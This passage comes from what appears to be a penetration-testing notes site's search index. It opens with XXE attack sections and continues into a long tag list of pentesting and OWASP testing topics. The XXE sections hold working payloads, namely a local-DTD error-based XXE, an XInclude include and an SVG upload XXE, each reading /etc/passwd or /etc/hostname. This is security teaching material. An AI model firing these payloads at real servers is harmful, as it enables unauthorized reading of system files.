                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#6-blind-xxe-by-repurposing-a-local-dtd","title":"6. Blind XXE by repurposing a local DTD","text":"

                                            If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.

                                            Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

                                            For example, suppose there is a DTD file on the server filesystem at the location\u00a0/usr/local/app/schema.dtd, and this DTD file defines an entity called\u00a0custom_entity. An attacker can trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file by submitting a hybrid DTD like the following:

                                            <!DOCTYPE foo [ \n<!ENTITY % local_dtd SYSTEM \"file:///usr/local/app/schema.dtd\"> \n<!ENTITY % custom_entity ' \n<!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> \n%local_dtd; \n]>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#7-xinclude-attack","title":"7. XInclude attack","text":"

                                            In the following scenario, we cannot implement a classic/blind/oob XXE attack because we don't control the entire XML document and so we cannot define the DOCTYPE element.

                                            We can bypass this client side verification with XInclude. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. We can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

                                            For instance:

                                            <d0p xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n<xi:include parse=\"text\" href=\"file:///etc/passwd\"/></d0p>\n

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#8-xxe-via-file-upload","title":"8. XXE via file upload","text":"

                                            In a file upload feature, if the application expects to receive a format like .png or .jpeg, then the image processing lib is likely to accept .svg too.

                                            Our XXE payload could be:

                                            <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#interesting-files","title":"Interesting files","text":"

                                            Interesting Windows files Interesting Linux files

                                            ","tags":["xxe"]},{"location":"tags/","title":"tags","text":"

                                            Following is a list of relevant tags:

                                            ","tags":["tags"]},{"location":"tags/#389","title":"389","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#azure","title":"Azure","text":"
                                            • Pentesting Amazon Web Services (AWS)
                                            • Pentesting Azure
                                            ","tags":["tags"]},{"location":"tags/#cms","title":"CMS","text":"
                                            • Pentesting MyBB
                                            • pentesting wordpress
                                            ","tags":["tags"]},{"location":"tags/#cpts","title":"CPTS","text":"
                                            • CPTS index
                                            • 01. Information Gathering / Footprinting
                                            • Pentesting Notes
                                            ","tags":["tags"]},{"location":"tags/#cve-2015-6967","title":"CVE-2015-6967","text":"
                                            • Nibbles - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#dns-poisoning","title":"DNS poisoning","text":"
                                            • DNS poisoning
                                            ","tags":["tags"]},{"location":"tags/#dynamics","title":"Dynamics","text":"
                                            • Pentesting oDAta
                                            ","tags":["tags"]},{"location":"tags/#http","title":"HTTP","text":"
                                            • CSRF attack - Cross Site Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#microsoft-365","title":"Microsoft 365","text":"
                                            • M365 CLI
                                            ","tags":["tags"]},{"location":"tags/#mybb","title":"MyBB","text":"
                                            • Pentesting MyBB
                                            ","tags":["tags"]},{"location":"tags/#nfc","title":"NFC","text":"
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • NFC - Setting up proxmark3 RDV4.01
                                            • Proxmark3 RDV4.01
                                            ","tags":["tags"]},{"location":"tags/#nfs","title":"NFS","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#ntlm","title":"NTLM","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#ntlm-credential-stealing","title":"NTLM credential stealing","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#network-file-system","title":"Network File System","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#nosql","title":"NoSQL","text":"
                                            • Mongo
                                            ","tags":["tags"]},{"location":"tags/#oscp","title":"OSCP","text":"
                                            • Password attacks
                                            ","tags":["tags"]},{"location":"tags/#openflow","title":"Openflow","text":"
                                            • 6653 Openflow
                                            ","tags":["tags"]},{"location":"tags/#openstack","title":"Openstack","text":"
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#rfid","title":"RFID","text":"
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • RFID
                                            ","tags":["tags"]},{"location":"tags/#rfid-pentesting","title":"RFID pentesting","text":"
                                            • NFC - Setting up proxmark3 RDV4.01
                                            ","tags":["tags"]},{"location":"tags/#smtp","title":"SMTP","text":"
                                            • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                                            • postfix - A SMTP server
                                            ","tags":["tags"]},{"location":"tags/#smtp-server","title":"SMTP server","text":"
                                            • postfix - A SMTP server
                                            ","tags":["tags"]},{"location":"tags/#snmp","title":"SNMP","text":"
                                            • 161-162 SNMP Simple Network Management Protocol
                                            ","tags":["tags"]},{"location":"tags/#sql","title":"SQL","text":"
                                            • MariaDB
                                            • MySQL
                                            • sqlite
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#simple-mail-transfer-protocol","title":"Simple Mail Transfer Protocol","text":"
                                            • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#wstg-apit-01","title":"WSTG-APIT-01","text":"
                                            • Testing GraphQL - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-01","title":"WSTG-ATHN-01","text":"
                                            • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-02","title":"WSTG-ATHN-02","text":"
                                            • Testing for Default Credentials - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-03","title":"WSTG-ATHN-03","text":"
                                            • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-04","title":"WSTG-ATHN-04","text":"
                                            • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-05","title":"WSTG-ATHN-05","text":"
                                            • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-06","title":"WSTG-ATHN-06","text":"
                                            • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-07","title":"WSTG-ATHN-07","text":"
                                            • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-08","title":"WSTG-ATHN-08","text":"
                                            • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-09","title":"WSTG-ATHN-09","text":"
                                            • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-10","title":"WSTG-ATHN-10","text":"
                                            • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athn-11","title":"WSTG-ATHN-11","text":"
                                            • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-01","title":"WSTG-ATHZ-01","text":"
                                            • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-02","title":"WSTG-ATHZ-02","text":"
                                            • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-03","title":"WSTG-ATHZ-03","text":"
                                            • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-04","title":"WSTG-ATHZ-04","text":"
                                            • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-athz-05","title":"WSTG-ATHZ-05","text":"
                                            • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-01","title":"WSTG-BUSL-01","text":"
                                            • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-02","title":"WSTG-BUSL-02","text":"
                                            • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-03","title":"WSTG-BUSL-03","text":"
                                            • Test Integrity Checks - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-04","title":"WSTG-BUSL-04","text":"
                                            • Test for Process Timing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-05","title":"WSTG-BUSL-05","text":"
                                            • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-06","title":"WSTG-BUSL-06","text":"
                                            • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-07","title":"WSTG-BUSL-07","text":"
                                            • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-08","title":"WSTG-BUSL-08","text":"
                                            • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-09","title":"WSTG-BUSL-09","text":"
                                            • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-busl-10","title":"WSTG-BUSL-10","text":"
                                            • Test Payment Functionality - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-01","title":"WSTG-CLNT-01","text":"
                                            • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-02","title":"WSTG-CLNT-02","text":"
                                            • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-03","title":"WSTG-CLNT-03","text":"
                                            • Testing for HTML Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-04","title":"WSTG-CLNT-04","text":"
                                            • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-05","title":"WSTG-CLNT-05","text":"
                                            • Testing for CSS Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-06","title":"WSTG-CLNT-06","text":"
                                            • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-07","title":"WSTG-CLNT-07","text":"
                                            • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-08","title":"WSTG-CLNT-08","text":"
                                            • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-09","title":"WSTG-CLNT-09","text":"
                                            • Testing for Clickjackingx - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-10","title":"WSTG-CLNT-10","text":"
                                            • Testing WebSockets - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-11","title":"WSTG-CLNT-11","text":"
                                            • Testing Web Messaging - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-12","title":"WSTG-CLNT-12","text":"
                                            • Testing Browser Storage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-13","title":"WSTG-CLNT-13","text":"
                                            • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-clnt-14","title":"WSTG-CLNT-14","text":"
                                            • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-01","title":"WSTG-CONF-01","text":"
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-02","title":"WSTG-CONF-02","text":"
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-03","title":"WSTG-CONF-03","text":"
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-04","title":"WSTG-CONF-04","text":"
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-05","title":"WSTG-CONF-05","text":"
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-06","title":"WSTG-CONF-06","text":"
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-07","title":"WSTG-CONF-07","text":"
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-08","title":"WSTG-CONF-08","text":"
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-09","title":"WSTG-CONF-09","text":"
                                            • Test File Permission - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-10","title":"WSTG-CONF-10","text":"
                                            • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-11","title":"WSTG-CONF-11","text":"
                                            • Test Cloud Storage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-12","title":"WSTG-CONF-12","text":"
                                            • Testing for Content Security Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-conf-13","title":"WSTG-CONF-13","text":"
                                            • Test Path Confusion - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-01","title":"WSTG-CRYP-01","text":"
                                            • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-02","title":"WSTG-CRYP-02","text":"
                                            • Testing for Padding Oracle - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-03","title":"WSTG-CRYP-03","text":"
                                            • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-cryp-04","title":"WSTG-CRYP-04","text":"
                                            • Testing for Weak Encryption - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-errh-01","title":"WSTG-ERRH-01","text":"
                                            • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-errh-02","title":"WSTG-ERRH-02","text":"
                                            • Testing for Stack Traces - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-01","title":"WSTG-IDNT-01","text":"
                                            • Test Role Definitions - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-02","title":"WSTG-IDNT-02","text":"
                                            • Test User Registration Process - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-03","title":"WSTG-IDNT-03","text":"
                                            • Test Account Provisioning Process - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-04","title":"WSTG-IDNT-04","text":"
                                            • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-idnt-05","title":"WSTG-IDNT-05","text":"
                                            • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-01","title":"WSTG-INFO-01","text":"
                                            • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-02","title":"WSTG-INFO-02","text":"
                                            • nikto
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-03","title":"WSTG-INFO-03","text":"
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-04","title":"WSTG-INFO-04","text":"
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-05","title":"WSTG-INFO-05","text":"
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-06","title":"WSTG-INFO-06","text":"
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-07","title":"WSTG-INFO-07","text":"
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-08","title":"WSTG-INFO-08","text":"
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-09","title":"WSTG-INFO-09","text":"
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-info-10","title":"WSTG-INFO-10","text":"
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-01","title":"WSTG-INPV-01","text":"
                                            • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-02","title":"WSTG-INPV-02","text":"
                                            • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-03","title":"WSTG-INPV-03","text":"
                                            • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-04","title":"WSTG-INPV-04","text":"
                                            • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-05","title":"WSTG-INPV-05","text":"
                                            • Testing for SQL Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-06","title":"WSTG-INPV-06","text":"
                                            • Testing for LDAP Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-07","title":"WSTG-INPV-07","text":"
                                            • Testing for XML Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-08","title":"WSTG-INPV-08","text":"
                                            • Testing for SSI Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-09","title":"WSTG-INPV-09","text":"
                                            • Testing for XPath Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-10","title":"WSTG-INPV-10","text":"
                                            • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-11","title":"WSTG-INPV-11","text":"
                                            • Testing for Code Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-12","title":"WSTG-INPV-12","text":"
                                            • Testing for Command Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-13","title":"WSTG-INPV-13","text":"
                                            • Testing for Format String Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-14","title":"WSTG-INPV-14","text":"
                                            • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-15","title":"WSTG-INPV-15","text":"
                                            • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-16","title":"WSTG-INPV-16","text":"
                                            • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-17","title":"WSTG-INPV-17","text":"
                                            • Testing for Host Header Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-18","title":"WSTG-INPV-18","text":"
                                            • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-19","title":"WSTG-INPV-19","text":"
                                            • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-20","title":"WSTG-INPV-20","text":"
                                            • Testing for Mass Assignment - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-01","title":"WSTG-SESS-01","text":"
                                            • Testing for Session Management Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-02","title":"WSTG-SESS-02","text":"
                                            • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-03","title":"WSTG-SESS-03","text":"
                                            • Testing for Session Fixation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-04","title":"WSTG-SESS-04","text":"
                                            • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-05","title":"WSTG-SESS-05","text":"
                                            • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-06","title":"WSTG-SESS-06","text":"
                                            • Testing for Logout Functionality - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-07","title":"WSTG-SESS-07","text":"
                                            • Testing Session Timeout - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-08","title":"WSTG-SESS-08","text":"
                                            • Testing for Session Puzzling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-09","title":"WSTG-SESS-09","text":"
                                            • Testing for Session Hijacking - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-10","title":"WSTG-SESS-10","text":"
                                            • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#active","title":"active","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#active-directory","title":"active directory","text":"
                                            • Active Directory - LDAP
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
                                            • evil-winrm
                                            • Microsoft Management Console (MMC)
                                            • NT Authority System
                                            • PowerUp.ps1
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • SharpView
                                            ","tags":["tags"]},{"location":"tags/#active-recon","title":"active recon","text":"
                                            • nmap - A network exploration and security auditing tool
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            ","tags":["tags"]},{"location":"tags/#aes","title":"aes","text":"
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            ","tags":["tags"]},{"location":"tags/#amazon","title":"amazon","text":"
                                            • AWS cli
                                            ","tags":["tags"]},{"location":"tags/#amazon-web-services","title":"amazon web services","text":"
                                            • Amazon Web Services (AWS) Essentials
                                            ","tags":["tags"]},{"location":"tags/#android","title":"android","text":"
                                            • scrcpy
                                            ","tags":["tags"]},{"location":"tags/#apache-cloudstack","title":"apache cloudstack","text":"
                                            • Apache CloudStack Essentials
                                            ","tags":["tags"]},{"location":"tags/#api","title":"api","text":"
                                            • arjun
                                            • Hacking APIs
                                            • API authentication attacks
                                            • Api Reconnaissance
                                            • Endpoint analysis
                                            • Evasion and combinig techniques
                                            • Exploiting API Authorization
                                            • Testing for improper assets management
                                            • Injection attacks
                                            • Mass assignment
                                            • Setting up the labs + Writeups
                                            • Scanning APIs
                                            • SSRF attack - Server-side Request Forgery
                                            • Setting up the environment
                                            ","tags":["tags"]},{"location":"tags/#arp","title":"arp","text":"
                                            • Arp poisoning
                                            ","tags":["tags"]},{"location":"tags/#arp-poisoning","title":"arp poisoning","text":"
                                            • Arp poisoning
                                            ","tags":["tags"]},{"location":"tags/#assessment","title":"assessment","text":"
                                            • Vulnerability assessment
                                            ","tags":["tags"]},{"location":"tags/#attack","title":"attack","text":"
                                            • Broken access control
                                            • Buffer Overflow attack
                                            • Captcha Replay attack
                                            • Carriage Return and Linefeed - CRLF Attack
                                            • XFS attack - Cross-frame Scripting
                                            • CSRF attack - Cross Site Request Forgery
                                            • XSS attack - Cross-Site Scripting
                                            • Insecure deserialization
                                            ","tags":["tags"]},{"location":"tags/#authentication","title":"authentication","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#aws","title":"aws","text":"
                                            • AWS cli
                                            • Amazon Web Services (AWS) Essentials
                                            ","tags":["tags"]},{"location":"tags/#az-104","title":"az-104","text":"
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            ","tags":["tags"]},{"location":"tags/#az-500","title":"az-500","text":"
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            ","tags":["tags"]},{"location":"tags/#az-900","title":"az-900","text":"
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#azure_1","title":"azure","text":"
                                            • Azure-CLI
                                            • Azure Powershell
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#azure-cli","title":"azure-cli","text":"
                                            • Azure-CLI
                                            ","tags":["tags"]},{"location":"tags/#backdoors","title":"backdoors","text":"
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            ","tags":["tags"]},{"location":"tags/#bash","title":"bash","text":"
                                            • Packet manager
                                            • Azure-CLI
                                            • bash - Bourne Again Shell
                                            • curl
                                            • unshadow
                                            • vnstat - Monitoring network impact
                                            ","tags":["tags"]},{"location":"tags/#basic-digest","title":"basic digest","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#bcm","title":"bcm","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            ","tags":["tags"]},{"location":"tags/#binaries","title":"binaries","text":"
                                            • LOLbins - Living off the land binaries - LOLbas and GTFObins
                                            ","tags":["tags"]},{"location":"tags/#bind-shells","title":"bind shells","text":"
                                            • Bind Shells
                                            ","tags":["tags"]},{"location":"tags/#binscope","title":"binscope","text":"
                                            • Common vulnerabilities
                                            ","tags":["tags"]},{"location":"tags/#browsers","title":"browsers","text":"
                                            • Pentesting browsers
                                            • Man in the browser attack
                                            ","tags":["tags"]},{"location":"tags/#brute-force","title":"brute force","text":"
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            ","tags":["tags"]},{"location":"tags/#brute-forcing","title":"brute forcing","text":"
                                            • hydra
                                            • medusa
                                            ","tags":["tags"]},{"location":"tags/#burpsuite","title":"burpsuite","text":"
                                            • Burpsuite
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • BurpSuite Labs - Broken access control vulnerabilities
                                            • BurpSuite Labs - Insecure deserialization
                                            • BurpSuite Labs - Json Web Token jwt
                                            • BurpSuite Labs
                                            • BurpSuite Labs - SQL injection
                                            • BurpSuite Labs - Server Side Request Forgery
                                            • BurpSuite Labs - Server Side Template Injection
                                            • BurpSuite Labs - Cross-site Scripting
                                            • BurpSuite Labs - Json Web Token jwt
